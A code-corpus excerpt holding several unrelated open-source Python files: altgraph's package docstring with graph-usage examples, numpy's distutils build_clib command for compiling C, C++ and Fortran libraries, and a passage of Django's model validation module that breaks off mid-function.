7472,7473,7474,7475,7476,7477,7478,7479,7480,7481,7482,7483,7484,7485,7486,7487,
7488,7489,7490,7491,7492,7493,7494,7495,7496,7497,7498,7499,7500,7501,7502,7503,
7504,7505,7506,7507,7508,7509,7510,7511,7512,7513,7514,7515,7516,7517,7518,7519,
7520,7521,7522,7523,7524,7525,7526,7527,7528,7529,7530,7531,7532,7533,7534,7535,
7536,7537,7538,7539,7540,7541,7542,7543,7544,7545,7546,7547,7548,7549,7550,7551,
7552,7553,7554,7555,7556,7557,7558,7559,7560,7561,7562,7563,7564,7565,7566,7567,
7568,7569,7570,7571,7572,7573,7574,7575,7576,7577,7578,7579,7580,7581,7582,7583,
7584,7585,7586,7587,7588,7589,7590,7591,7592,7593,7594,7595,7596,7597,7598,7599,
7600,7601,7602,7603,7604,7605,7606,7607,7608,7609,7610,7611,7612,7613,7614,7615,
7616,7617,7618,7619,7620,7621,7622,7623,7624,7625,7626,7627,7628,7629,7630,7631,
7632,7633,7634,7635,7636,7637,7638,7639,7640,7641,7642,7643,7644,7645,7646,7647,
7648,7649,7650,7651,7652,7653,7654,7655,7656,7657,7658,7659,7660,7661,7662,7663,
7664,7665,7666,7667,7668,7669,7670,7671,7672,7673,7674,7675,7676,7677,7678,7679,
7680,7681,7682,7683,7684,7685,7686,7687,7688,7689,7690,7691,7692,7693,7694,7695,
7696,7697,7698,7699,7700,7701,7702,7703,7704,7705,7706,7707,7708,7709,7710,7711,
7712,7713,7714,7715,7716,7717,7718,7719,7720,7721,7722,7723,7724,7725,7726,7727,
7728,7729,7730,7731,7732,7733,7734,7735,7736,7737,7738,7739,7740,7741,7742,7743,
7744,7745,7746,7747,7748,7749,7750,7751,7752,7753,7754,7755,7756,7757,7758,7759,
7760,7761,7762,7763,7764,7765,7766,7767,7768,7769,7770,7771,7772,7773,7774,7775,
7776,7777,7778,7779,7780,7781,7782,7783,7784,7785,7786,7787,7788,7789,7790,7791,
7792,7793,7794,7795,7796,7797,7798,7799,7800,7801,7802,7803,7804,7805,7806,7807,
7808,7809,7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,
7824,7825,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,
7840,7841,7842,7843,7844,7845,7846,7847,7848,7849,7850,7851,7852,7853,7854,7855,
7856,7857,7858,7859,7860,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870,7871,
7872,7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886,7887,
7888,7889,7890,7891,7892,7893,7894,7895,7896,7897,7898,7899,7900,7901,7902,7903,
7904,7905,7906,7907,7908,7909,7910,7911,7912,7913,7914,7915,7916,7917,7918,7919,
7920,7921,7922,7923,7924,7925,7926,7927,7928,7929,7930,7931,7932,7933,7934,7935,
7936,7937,7938,7939,7940,7941,7942,7943,7944,7945,7946,7947,7948,7949,7950,7951,
7952,7953,7954,7955,7956,7957,7958,7959,7960,7961,7962,7963,7964,7965,7966,7967,
7968,7969,7970,7971,7972,7973,7974,7975,7976,7977,7978,7979,7980,7981,7982,7983,
7984,7985,7986,7987,7988,7989,7990,7991,7992,7993,7994,7995,7996,7997,7998,7999,
8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,
8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031,
8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047,
8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063,
8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079,
8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,
8096,8097,8098,8099,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110,8111,
8112,8113,8114,8115,8116,8117,8118,8119,8120,8121,8122,8123,8124,8125,8126,8127,
8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141,8142,8143,
8144,8145,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155,8156,8157,8158,8159,
8160,8161,8162,8163,8164,8165,8166,8167,8168,8169,8170,8171,8172,8173,8174,8175,
8176,8177,8178,8179,8180,8181,8182,8183,8184,8185,8186,8187,8188,8189,8190,8191,
8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8203,8204,8205,8206,8207,
8208,8209,8210,8211,8212,8213,8214,8215,8216,8217,8218,8219,8220,8221,8222,8223,
8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239,
8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255,
8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271,
8272,8273,8274,8275,8276,8277,8278,8279,8280,8281,8282,8283,8284,8285,8286,8287,
8288,8289,8290,8291,8292,8293,8294,8295,8296,8297,8298,8299,8300,8301,8302,8303,
8304,8305,8306,8307,8308,8309,8310,8311,8312,8313,8314,8315,8316,8317,8318,8319,
8320,8321,8322,8323,8324,8325,8326,8327,8328,8329,8330,8331,8332,8333,8334,8335,
8336,8337,8338,8339,8340,8341,8342,8343,8344,8345,8346,8347,8348,8349,8350,8351,
8352,8353,8354,8355,8356,8357,8358,8359,8360,8361,8362,8363,8364,8365,8366,8367,
8368,8369,8370,8371,8372,8373,8374,8375,8376,8377,8378,8379,8380,8381,8382,8383,
8384,8385,8386,8387,8388,8389,8390,8391,8392,8393,8394,8395,8396,8397,8398,8399,
8400,8401,8402,8403,8404,8405,8406,8407,8408,8409,8410,8411,8412,8413,8414,8415,
8416,8417,8418,8419,8420,8421,8422,8423,8424,8425,8426,8427,8428,8429,8430,8431,
8432,8433,8434,8435,8436,8437,8438,8439,8440,8441,8442,8443,8444,8445,8446,8447,
8448,8449,8450,8451,8452,8453,8454,8455,8456,8457,8458,8459,8460,8461,8462,8463,
8464,8465,8466,8467,8468,8469,8470,8471,8472,8473,8474,8475,8476,8477,8478,8479,
8480,8481,8482,8483,8484,8485,8486,8487,8488,8489,8490,8491,8492,8493,8494,8495,
8496,8497,8498,8499,8500,8501,8502,8503,8504,8505,8506,8507,8508,8509,8510,8511,
8512,8513,8514,8515,8516,8517,8518,8519,8520,8521,8522,8523,8524,8525,8526,8527,
8528,8529,8530,8531,8532,8533,8534,8535,8536,8537,8538,8539,8540,8541,8542,8543,
8544,8545,8546,8547,8548,8549,8550,8551,8552,8553,8554,8555,8556,8557,8558,8559,
8560,8561,8562,8563,8564,8565,8566,8567,8568,8569,8570,8571,8572,8573,8574,8575,
8576,8577,8578,8579,8580,8581,8582,8583,8584,8585,8586,8587,8588,8589,8590,8591,
8592,8593,8594,8595,8596,8597,8598,8599,8600,8601,8602,8603,8604,8605,8606,8607,
8608,8609,8610,8611,8612,8613,8614,8615,8616,8617,8618,8619,8620,8621,8622,8623,
8624,8625,8626,8627,8628,8629,8630,8631,8632,8633,8634,8635,8636,8637,8638,8639,
8640,8641,8642,8643,8644,8645,8646,8647,8648,8649,8650,8651,8652,8653,8654,8655,
8656,8657,8658,8659,8660,8661,8662,8663,8664,8665,8666,8667,8668,8669,8670,8671,
8672,8673,8674,8675,8676,8677,8678,8679,8680,8681,8682,8683,8684,8685,8686,8687,
8688,8689,8690,8691,8692,8693,8694,8695,8696,8697,8698,8699,8700,8701,8702,8703,
8704,8705,8706,8707,8708,8709,8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,
8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,
8736,8737,8738,8739,8740,8741)
# flake8: noqa
| mit |
joaormatos/anaconda | Anaconda/standalone/trunk/PyInstaller/lib/altgraph/__init__.py | 12 | 4907 | '''
altgraph - a python graph library
=================================
altgraph is a fork of `graphlib <http://pygraphlib.sourceforge.net>`_ tailored
to use newer Python 2.3+ features, including additional support used by the
py2app suite (modulegraph and macholib, specifically).
altgraph is a python based graph (network) representation and manipulation package.
It has started out as an extension to the `graph_lib module <http://www.ece.arizona.edu/~denny/python_nest/graph_lib_1.0.1.html>`_
written by Nathan Denny it has been significantly optimized and expanded.
The :class:`altgraph.Graph.Graph` class is loosely modeled after the `LEDA <http://www.algorithmic-solutions.com/enleda.htm>`_
(Library of Efficient Datatypes) representation. The library
includes methods for constructing graphs, BFS and DFS traversals,
topological sort, finding connected components, shortest paths as well as a number
graph statistics functions. The library can also visualize graphs
via `graphviz <http://www.research.att.com/sw/tools/graphviz/>`_.
The package contains the following modules:
- the :py:mod:`altgraph.Graph` module contains the :class:`~altgraph.Graph.Graph` class that stores the graph data
- the :py:mod:`altgraph.GraphAlgo` module implements graph algorithms operating on graphs (:py:class:`~altgraph.Graph.Graph`} instances)
- the :py:mod:`altgraph.GraphStat` module contains functions for computing statistical measures on graphs
- the :py:mod:`altgraph.GraphUtil` module contains functions for generating, reading and saving graphs
- the :py:mod:`altgraph.Dot` module contains functions for displaying graphs via `graphviz <http://www.research.att.com/sw/tools/graphviz/>`_
- the :py:mod:`altgraph.ObjectGraph` module implements a graph of objects with a unique identifier
Installation
------------
Download and unpack the archive then type::
python setup.py install
This will install the library in the default location. For instructions on
how to customize the install procedure read the output of::
python setup.py --help install
To verify that the code works run the test suite::
python setup.py test
Example usage
-------------
Lets assume that we want to analyze the graph below (links to the full picture) GRAPH_IMG.
Our script then might look the following way::
from altgraph import Graph, GraphAlgo, Dot
# these are the edges
edges = [ (1,2), (2,4), (1,3), (2,4), (3,4), (4,5), (6,5),
(6,14), (14,15), (6, 15), (5,7), (7, 8), (7,13), (12,8),
(8,13), (11,12), (11,9), (13,11), (9,13), (13,10) ]
# creates the graph
graph = Graph.Graph()
for head, tail in edges:
graph.add_edge(head, tail)
# do a forward bfs from 1 at most to 20
print graph.forw_bfs(1)
This will print the nodes in some breadth first order::
[1, 2, 3, 4, 5, 7, 8, 13, 11, 10, 12, 9]
If we wanted to get the hop-distance from node 1 to node 8
we coud write::
print graph.get_hops(1, 8)
This will print the following::
[(1, 0), (2, 1), (3, 1), (4, 2), (5, 3), (7, 4), (8, 5)]
Node 1 is at 0 hops since it is the starting node, nodes 2,3 are 1 hop away ...
node 8 is 5 hops away. To find the shortest distance between two nodes you
can use::
print GraphAlgo.shortest_path(graph, 1, 12)
It will print the nodes on one (if there are more) the shortest paths::
[1, 2, 4, 5, 7, 13, 11, 12]
To display the graph we can use the GraphViz backend::
dot = Dot.Dot(graph)
# display the graph on the monitor
dot.display()
# save it in an image file
dot.save_img(file_name='graph', file_type='gif')
..
@author: U{Istvan Albert<http://www.personal.psu.edu/staff/i/u/iua1/>}
@license: MIT License
Copyright (c) 2004 Istvan Albert unless otherwise noted.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do
so.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
@requires: Python 2.3 or higher
@newfield contributor: Contributors:
@contributor: U{Reka Albert <http://www.phys.psu.edu/~ralbert/>}
'''
__version__ = '0.7.0'
class GraphError(ValueError):
pass
| gpl-3.0 |
rhythmsosad/numpy | numpy/distutils/command/build_clib.py | 152 | 12217 | """ Modified version of build_clib that handles fortran source files.
"""
from __future__ import division, absolute_import, print_function
import os
from glob import glob
import shutil
from distutils.command.build_clib import build_clib as old_build_clib
from distutils.errors import DistutilsSetupError, DistutilsError, \
DistutilsFileError
from numpy.distutils import log
from distutils.dep_util import newer_group
from numpy.distutils.misc_util import filter_sources, has_f_sources,\
has_cxx_sources, all_strings, get_lib_source_files, is_sequence, \
get_numpy_include_dirs
# Fix Python distutils bug sf #1718574:
_l = old_build_clib.user_options
for _i in range(len(_l)):
if _l[_i][0] in ['build-clib', 'build-temp']:
_l[_i] = (_l[_i][0]+'=',)+_l[_i][1:]
#
class build_clib(old_build_clib):
description = "build C/C++/F libraries used by Python extensions"
user_options = old_build_clib.user_options + [
('fcompiler=', None,
"specify the Fortran compiler type"),
('inplace', 'i', 'Build in-place'),
('parallel=', 'j',
"number of parallel jobs"),
]
boolean_options = old_build_clib.boolean_options + ['inplace']
def initialize_options(self):
old_build_clib.initialize_options(self)
self.fcompiler = None
self.inplace = 0
self.parallel = None
def finalize_options(self):
if self.parallel:
try:
self.parallel = int(self.parallel)
except ValueError:
raise ValueError("--parallel/-j argument must be an integer")
old_build_clib.finalize_options(self)
self.set_undefined_options('build', ('parallel', 'parallel'))
def have_f_sources(self):
for (lib_name, build_info) in self.libraries:
if has_f_sources(build_info.get('sources', [])):
return True
return False
def have_cxx_sources(self):
for (lib_name, build_info) in self.libraries:
if has_cxx_sources(build_info.get('sources', [])):
return True
return False
def run(self):
if not self.libraries:
return
# Make sure that library sources are complete.
languages = []
# Make sure that extension sources are complete.
self.run_command('build_src')
for (lib_name, build_info) in self.libraries:
l = build_info.get('language', None)
if l and l not in languages: languages.append(l)
from distutils.ccompiler import new_compiler
self.compiler = new_compiler(compiler=self.compiler,
dry_run=self.dry_run,
force=self.force)
self.compiler.customize(self.distribution,
need_cxx=self.have_cxx_sources())
libraries = self.libraries
self.libraries = None
self.compiler.customize_cmd(self)
self.libraries = libraries
self.compiler.show_customization()
if self.have_f_sources():
from numpy.distutils.fcompiler import new_fcompiler
self._f_compiler = new_fcompiler(compiler=self.fcompiler,
verbose=self.verbose,
dry_run=self.dry_run,
force=self.force,
requiref90='f90' in languages,
c_compiler=self.compiler)
if self._f_compiler is not None:
self._f_compiler.customize(self.distribution)
libraries = self.libraries
self.libraries = None
self._f_compiler.customize_cmd(self)
self.libraries = libraries
self._f_compiler.show_customization()
else:
self._f_compiler = None
self.build_libraries(self.libraries)
if self.inplace:
for l in self.distribution.installed_libraries:
libname = self.compiler.library_filename(l.name)
source = os.path.join(self.build_clib, libname)
target = os.path.join(l.target_dir, libname)
self.mkpath(l.target_dir)
shutil.copy(source, target)
def get_source_files(self):
self.check_library_list(self.libraries)
filenames = []
for lib in self.libraries:
filenames.extend(get_lib_source_files(lib))
return filenames
def build_libraries(self, libraries):
for (lib_name, build_info) in libraries:
self.build_a_library(build_info, lib_name, libraries)
def build_a_library(self, build_info, lib_name, libraries):
# default compilers
compiler = self.compiler
fcompiler = self._f_compiler
sources = build_info.get('sources')
if sources is None or not is_sequence(sources):
raise DistutilsSetupError(("in 'libraries' option (library '%s'), " +
"'sources' must be present and must be " +
"a list of source filenames") % lib_name)
sources = list(sources)
c_sources, cxx_sources, f_sources, fmodule_sources \
= filter_sources(sources)
requiref90 = not not fmodule_sources or \
build_info.get('language', 'c')=='f90'
# save source type information so that build_ext can use it.
source_languages = []
if c_sources: source_languages.append('c')
if cxx_sources: source_languages.append('c++')
if requiref90: source_languages.append('f90')
elif f_sources: source_languages.append('f77')
build_info['source_languages'] = source_languages
lib_file = compiler.library_filename(lib_name,
output_dir=self.build_clib)
depends = sources + build_info.get('depends', [])
if not (self.force or newer_group(depends, lib_file, 'newer')):
log.debug("skipping '%s' library (up-to-date)", lib_name)
return
else:
log.info("building '%s' library", lib_name)
config_fc = build_info.get('config_fc', {})
if fcompiler is not None and config_fc:
log.info('using additional config_fc from setup script '\
'for fortran compiler: %s' \
% (config_fc,))
from numpy.distutils.fcompiler import new_fcompiler
fcompiler = new_fcompiler(compiler=fcompiler.compiler_type,
verbose=self.verbose,
dry_run=self.dry_run,
force=self.force,
requiref90=requiref90,
c_compiler=self.compiler)
if fcompiler is not None:
dist = self.distribution
base_config_fc = dist.get_option_dict('config_fc').copy()
base_config_fc.update(config_fc)
fcompiler.customize(base_config_fc)
# check availability of Fortran compilers
if (f_sources or fmodule_sources) and fcompiler is None:
raise DistutilsError("library %s has Fortran sources"\
" but no Fortran compiler found" % (lib_name))
if fcompiler is not None:
fcompiler.extra_f77_compile_args = build_info.get('extra_f77_compile_args') or []
fcompiler.extra_f90_compile_args = build_info.get('extra_f90_compile_args') or []
macros = build_info.get('macros')
include_dirs = build_info.get('include_dirs')
if include_dirs is None:
include_dirs = []
extra_postargs = build_info.get('extra_compiler_args') or []
include_dirs.extend(get_numpy_include_dirs())
# where compiled F90 module files are:
module_dirs = build_info.get('module_dirs') or []
module_build_dir = os.path.dirname(lib_file)
if requiref90: self.mkpath(module_build_dir)
if compiler.compiler_type=='msvc':
# this hack works around the msvc compiler attributes
# problem, msvc uses its own convention :(
c_sources += cxx_sources
cxx_sources = []
objects = []
if c_sources:
log.info("compiling C sources")
objects = compiler.compile(c_sources,
output_dir=self.build_temp,
macros=macros,
include_dirs=include_dirs,
debug=self.debug,
extra_postargs=extra_postargs)
if cxx_sources:
log.info("compiling C++ sources")
cxx_compiler = compiler.cxx_compiler()
cxx_objects = cxx_compiler.compile(cxx_sources,
output_dir=self.build_temp,
macros=macros,
include_dirs=include_dirs,
debug=self.debug,
extra_postargs=extra_postargs)
objects.extend(cxx_objects)
if f_sources or fmodule_sources:
extra_postargs = []
f_objects = []
if requiref90:
if fcompiler.module_dir_switch is None:
existing_modules = glob('*.mod')
extra_postargs += fcompiler.module_options(\
module_dirs, module_build_dir)
if fmodule_sources:
log.info("compiling Fortran 90 module sources")
f_objects += fcompiler.compile(fmodule_sources,
output_dir=self.build_temp,
macros=macros,
include_dirs=include_dirs,
debug=self.debug,
extra_postargs=extra_postargs)
if requiref90 and self._f_compiler.module_dir_switch is None:
# move new compiled F90 module files to module_build_dir
for f in glob('*.mod'):
if f in existing_modules:
continue
t = os.path.join(module_build_dir, f)
if os.path.abspath(f)==os.path.abspath(t):
continue
if os.path.isfile(t):
os.remove(t)
try:
self.move_file(f, module_build_dir)
except DistutilsFileError:
log.warn('failed to move %r to %r' \
% (f, module_build_dir))
if f_sources:
log.info("compiling Fortran sources")
f_objects += fcompiler.compile(f_sources,
output_dir=self.build_temp,
macros=macros,
include_dirs=include_dirs,
debug=self.debug,
extra_postargs=extra_postargs)
else:
f_objects = []
objects.extend(f_objects)
# assume that default linker is suitable for
# linking Fortran object files
compiler.create_static_lib(objects, lib_name,
output_dir=self.build_clib,
debug=self.debug)
# fix library dependencies
clib_libraries = build_info.get('libraries', [])
for lname, binfo in libraries:
if lname in clib_libraries:
clib_libraries.extend(binfo.get('libraries', []))
if clib_libraries:
build_info['libraries'] = clib_libraries
| bsd-3-clause |
joshblum/django-with-audit | django/core/management/validation.py | 79 | 19846 | import sys
from django.core.management.color import color_style
from django.utils.itercompat import is_iterable
class ModelErrorCollection:
def __init__(self, outfile=sys.stdout):
self.errors = []
self.outfile = outfile
self.style = color_style()
def add(self, context, error):
self.errors.append((context, error))
self.outfile.write(self.style.ERROR("%s: %s\n" % (context, error)))
def get_validation_errors(outfile, app=None):
"""
Validates all models that are part of the specified app. If no app name is provided,
validates all models of all installed apps. Writes errors, if any, to outfile.
Returns number of errors.
"""
from django.conf import settings
from django.db import models, connection
from django.db.models.loading import get_app_errors
from django.db.models.fields.related import RelatedObject
from django.db.models.deletion import SET_NULL, SET_DEFAULT
e = ModelErrorCollection(outfile)
for (app_name, error) in get_app_errors().items():
e.add(app_name, error)
for cls in models.get_models(app):
opts = cls._meta
# Do field-specific validation.
for f in opts.local_fields:
if f.name == 'id' and not f.primary_key and opts.pk.name == 'id':
e.add(opts, '"%s": You can\'t use "id" as a field name, because each model automatically gets an "id" field if none of the fields have primary_key=True. You need to either remove/rename your "id" field or add primary_key=True to a field.' % f.name)
if f.name.endswith('_'):
e.add(opts, '"%s": Field names cannot end with underscores, because this would lead to ambiguous queryset filters.' % f.name)
if (f.primary_key and f.null and
not connection.features.interprets_empty_strings_as_nulls):
# We cannot reliably check this for backends like Oracle which
# consider NULL and '' to be equal (and thus set up
# character-based fields a little differently).
e.add(opts, '"%s": Primary key fields cannot have null=True.' % f.name)
if isinstance(f, models.CharField):
try:
max_length = int(f.max_length)
if max_length <= 0:
e.add(opts, '"%s": CharFields require a "max_length" attribute that is a positive integer.' % f.name)
except (ValueError, TypeError):
e.add(opts, '"%s": CharFields require a "max_length" attribute that is a positive integer.' % f.name)
if isinstance(f, models.DecimalField):
decimalp_ok, mdigits_ok = False, False
decimalp_msg ='"%s": DecimalFields require a "decimal_places" attribute that is a non-negative integer.'
try:
decimal_places = int(f.decimal_places)
if decimal_places < 0:
e.add(opts, decimalp_msg % f.name)
else:
decimalp_ok = True
except (ValueError, TypeError):
e.add(opts, decimalp_msg % f.name)
mdigits_msg = '"%s": DecimalFields require a "max_digits" attribute that is a positive integer.'
try:
max_digits = int(f.max_digits)
if max_digits <= 0:
e.add(opts, mdigits_msg % f.name)
else:
mdigits_ok = True
except (ValueError, TypeError):
e.add(opts, mdigits_msg % f.name)
invalid_values_msg = '"%s": DecimalFields require a "max_digits" attribute value that is greater than or equal to the value of the "decimal_places" attribute.'
if decimalp_ok and mdigits_ok:
if decimal_places > max_digits:
e.add(opts, invalid_values_msg % f.name)
if isinstance(f, models.FileField) and not f.upload_to:
e.add(opts, '"%s": FileFields require an "upload_to" attribute.' % f.name)
if isinstance(f, models.ImageField):
# Try to import PIL in either of the two ways it can end up installed.
try:
from PIL import Image
except ImportError:
try:
import Image
except ImportError:
e.add(opts, '"%s": To use ImageFields, you need to install the Python Imaging Library. Get it at http://www.pythonware.com/products/pil/ .' % f.name)
if isinstance(f, models.BooleanField) and getattr(f, 'null', False):
e.add(opts, '"%s": BooleanFields do not accept null values. Use a NullBooleanField instead.' % f.name)
if f.choices:
if isinstance(f.choices, basestring) or not is_iterable(f.choices):
e.add(opts, '"%s": "choices" should be iterable (e.g., a tuple or list).' % f.name)
else:
for c in f.choices:
if not isinstance(c, (list, tuple)) or len(c) != 2:
e.add(opts, '"%s": "choices" should be a sequence of two-tuples.' % f.name)
if f.db_index not in (None, True, False):
e.add(opts, '"%s": "db_index" should be either None, True or False.' % f.name)
# Perform any backend-specific field validation.
connection.validation.validate_field(e, opts, f)
# Check if the on_delete behavior is sane
if f.rel and hasattr(f.rel, 'on_delete'):
if f.rel.on_delete == SET_NULL and not f.null:
e.add(opts, "'%s' specifies on_delete=SET_NULL, but cannot be null." % f.name)
elif f.rel.on_delete == SET_DEFAULT and not f.has_default():
e.add(opts, "'%s' specifies on_delete=SET_DEFAULT, but has no default value." % f.name)
# Check to see if the related field will clash with any existing
# fields, m2m fields, m2m related objects or related objects
if f.rel:
if f.rel.to not in models.get_models():
e.add(opts, "'%s' has a relation with model %s, which has either not been installed or is abstract." % (f.name, f.rel.to))
# it is a string and we could not find the model it refers to
# so skip the next section
if isinstance(f.rel.to, (str, unicode)):
continue
# Make sure the related field specified by a ForeignKey is unique
if not f.rel.to._meta.get_field(f.rel.field_name).unique:
e.add(opts, "Field '%s' under model '%s' must have a unique=True constraint." % (f.rel.field_name, f.rel.to.__name__))
rel_opts = f.rel.to._meta
rel_name = RelatedObject(f.rel.to, cls, f).get_accessor_name()
rel_query_name = f.related_query_name()
if not f.rel.is_hidden():
for r in rel_opts.fields:
if r.name == rel_name:
e.add(opts, "Accessor for field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.local_many_to_many:
if r.name == rel_name:
e.add(opts, "Accessor for field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.get_all_related_many_to_many_objects():
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
for r in rel_opts.get_all_related_objects():
if r.field is not f:
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
seen_intermediary_signatures = []
for i, f in enumerate(opts.local_many_to_many):
# Check to see if the related m2m field will clash with any
# existing fields, m2m fields, m2m related objects or related
# objects
if f.rel.to not in models.get_models():
e.add(opts, "'%s' has an m2m relation with model %s, which has either not been installed or is abstract." % (f.name, f.rel.to))
# it is a string and we could not find the model it refers to
# so skip the next section
if isinstance(f.rel.to, (str, unicode)):
continue
# Check that the field is not set to unique. ManyToManyFields do not support unique.
if f.unique:
e.add(opts, "ManyToManyFields cannot be unique. Remove the unique argument on '%s'." % f.name)
if f.rel.through is not None and not isinstance(f.rel.through, basestring):
from_model, to_model = cls, f.rel.to
if from_model == to_model and f.rel.symmetrical and not f.rel.through._meta.auto_created:
e.add(opts, "Many-to-many fields with intermediate tables cannot be symmetrical.")
seen_from, seen_to, seen_self = False, False, 0
for inter_field in f.rel.through._meta.fields:
rel_to = getattr(inter_field.rel, 'to', None)
if from_model == to_model: # relation to self
if rel_to == from_model:
seen_self += 1
if seen_self > 2:
e.add(opts, "Intermediary model %s has more than "
"two foreign keys to %s, which is ambiguous "
"and is not permitted." % (
f.rel.through._meta.object_name,
from_model._meta.object_name
)
)
else:
if rel_to == from_model:
if seen_from:
e.add(opts, "Intermediary model %s has more "
"than one foreign key to %s, which is "
"ambiguous and is not permitted." % (
f.rel.through._meta.object_name,
from_model._meta.object_name
)
)
else:
seen_from = True
elif rel_to == to_model:
if seen_to:
e.add(opts, "Intermediary model %s has more "
"than one foreign key to %s, which is "
"ambiguous and is not permitted." % (
f.rel.through._meta.object_name,
rel_to._meta.object_name
)
)
else:
seen_to = True
if f.rel.through not in models.get_models(include_auto_created=True):
e.add(opts, "'%s' specifies an m2m relation through model "
"%s, which has not been installed." % (f.name, f.rel.through)
)
signature = (f.rel.to, cls, f.rel.through)
if signature in seen_intermediary_signatures:
e.add(opts, "The model %s has two manually-defined m2m "
"relations through the model %s, which is not "
"permitted. Please consider using an extra field on "
"your intermediary model instead." % (
cls._meta.object_name,
f.rel.through._meta.object_name
)
)
else:
seen_intermediary_signatures.append(signature)
if not f.rel.through._meta.auto_created:
seen_related_fk, seen_this_fk = False, False
for field in f.rel.through._meta.fields:
if field.rel:
if not seen_related_fk and field.rel.to == f.rel.to:
seen_related_fk = True
elif field.rel.to == cls:
seen_this_fk = True
if not seen_related_fk or not seen_this_fk:
e.add(opts, "'%s' is a manually-defined m2m relation "
"through model %s, which does not have foreign keys "
"to %s and %s" % (f.name, f.rel.through._meta.object_name,
f.rel.to._meta.object_name, cls._meta.object_name)
)
elif isinstance(f.rel.through, basestring):
e.add(opts, "'%s' specifies an m2m relation through model %s, "
"which has not been installed" % (f.name, f.rel.through)
)
rel_opts = f.rel.to._meta
rel_name = RelatedObject(f.rel.to, cls, f).get_accessor_name()
rel_query_name = f.related_query_name()
# If rel_name is none, there is no reverse accessor (this only
# occurs for symmetrical m2m relations to self). If this is the
# case, there are no clashes to check for this field, as there are
# no reverse descriptors for this field.
if rel_name is not None:
for r in rel_opts.fields:
if r.name == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.local_many_to_many:
if r.name == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.get_all_related_many_to_many_objects():
if r.field is not f:
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
for r in rel_opts.get_all_related_objects():
if r.get_accessor_name() == rel_name:
